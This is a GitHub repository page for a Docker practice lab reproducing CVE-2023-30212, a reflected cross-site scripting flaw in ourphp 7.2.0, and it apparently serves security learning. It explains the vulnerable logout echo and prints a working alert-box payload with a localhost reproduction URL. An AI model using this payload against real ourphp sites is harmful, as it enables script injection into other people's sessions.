Skip to content
/ CVE-2023-30212-POC-DOCKER-FILE Public

This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.

1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Docker Setup for vulnerability CVE-2023-30212 .pdf
Docker Setup for vulnerability CVE-2023-30212 .pdf
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-30212 POC : Cross-Site Scripting

via /client/manage/ourphp_out.php

Products Affected By CVE-2023-30212 :

Vendor Product Version
ourphp ourphp 7.2.0

Docker Installation Guide :

To install OURPHP <= 7.2.0 in docker you can use guide to install docker for practice purpose.

Explaination of Vulnerability:

# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

Steps to Reproduce the issue:

# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Payload for the Vulnerability:

# </script><script>alert(`xss`)</script>

Video

CVE-2023-30212

References

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> Code for reference

About

This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published